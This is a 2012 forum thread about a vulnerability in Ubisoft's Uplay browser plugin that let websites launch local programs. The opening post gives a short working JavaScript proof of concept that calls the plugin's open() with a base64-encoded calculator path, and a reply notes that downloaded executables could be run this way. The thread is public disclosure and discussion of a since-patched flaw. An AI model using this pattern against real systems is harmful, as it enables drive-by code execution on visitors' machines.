StarDestroyer.Net BBS

Posted: **2012-07-30 06:30am**

Source: http://news.ycombinator.com/item?id=4311264

If you play one of the games below try clicking on this link (tested with Assassin's Creed on Win7 and FireFox).
http://pastehtml.com/view/c6gxl1a79.html

var x = document.createElement('OBJECT');

x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")

Ubisoft installs a backdoor that allows any website to take over your computer. The Sony BMG rootkit was also DRM and required product recall when it was discovered.
http://en.wikipedia.org/wiki/Ubisoft#Games

Assassin's Creed II
Assassin's Creed: Brotherhood
Assassin's Creed: Project Legacy
Assassin's Creed Revelations
Assassin's Creed III
Beowulf: The Game
Brothers in Arms: Furious 4
Call of Juarez: The Cartel
Driver: San Francisco
Heroes of Might and Magic VI
Just Dance 3
Prince of Persia: The Forgotten Sands
Pure Football
R.U.S.E.
Shaun White Skateboarding
Silent Hunter 5: Battle of the Atlantic
The Settlers 7: Paths to a Kingdom
Tom Clancy's H.A.W.X. 2
Tom Clancy's Ghost Recon: Future Soldier
Tom Clancy's Splinter Cell: Conviction
Your Shape: Fitness Evolved

I thought I cannot be surprised by the imminent Ubisoft DRM fail, but this is something I didn't expect. I don't think this warrants any comment.

Posted: **2012-07-30 06:37am**

It is Ubisoft. Nothing really surprises me with them anymore.

Posted: **2012-07-30 07:09am**

You can open any program (where the path is known) and even pass command line arguements to it. You could probably download an exe with a program and then run it with no user interaction besides visiting the website.

This is big, this should be a lawsuit, and I'm looking forward to Ubisoft's response.

Posted: **2012-07-30 10:55am**

I have all the Assassin's Creed games and Forgotten Sands installed, but I don't have this plugin in either IE or Chrome, nor does the pastehtml link (which is supposed to open Calculator) do anything in either browser. I suspect this only applies to certain versions of the uPlay application; whether newer or older than the version I have, I have no idea.

Posted: **2012-07-30 01:11pm**

They updated it today to fix the vulnerability apparently.

Posted: **2012-07-30 04:18pm**

Not a rootkit, but a browser plugin exploit. Nonetheless, serious and something that should get them in seriously hot water despite the quick fix. We don't even know if the fix will actually plug the hole completely, but I for one will be following this news closely, since it has an impact on my work.

Posted: **2012-07-30 04:49pm**

Hey, maybe this will make them take out their shitty DRM of the PC version of ACIII. A man can dream, right?

Posted: **2012-07-30 05:09pm**

You could just remove it yourself.

Posted: **2012-07-31 03:55am**

I'll buy it for a console, and avoid the issue entirely.

StarDestroyer.Net BBS

Ubisoft DRM is a rootkit

Ubisoft DRM is a rootkit

Re: Ubisoft DRM is a rootkit

Re: Ubisoft DRM is a rootkit

Re: Ubisoft DRM is a rootkit

Re: Ubisoft DRM is a rootkit

Re: Ubisoft DRM is a rootkit

Re: Ubisoft DRM is a rootkit

Re: Ubisoft DRM is a rootkit

Re: Ubisoft DRM is a rootkit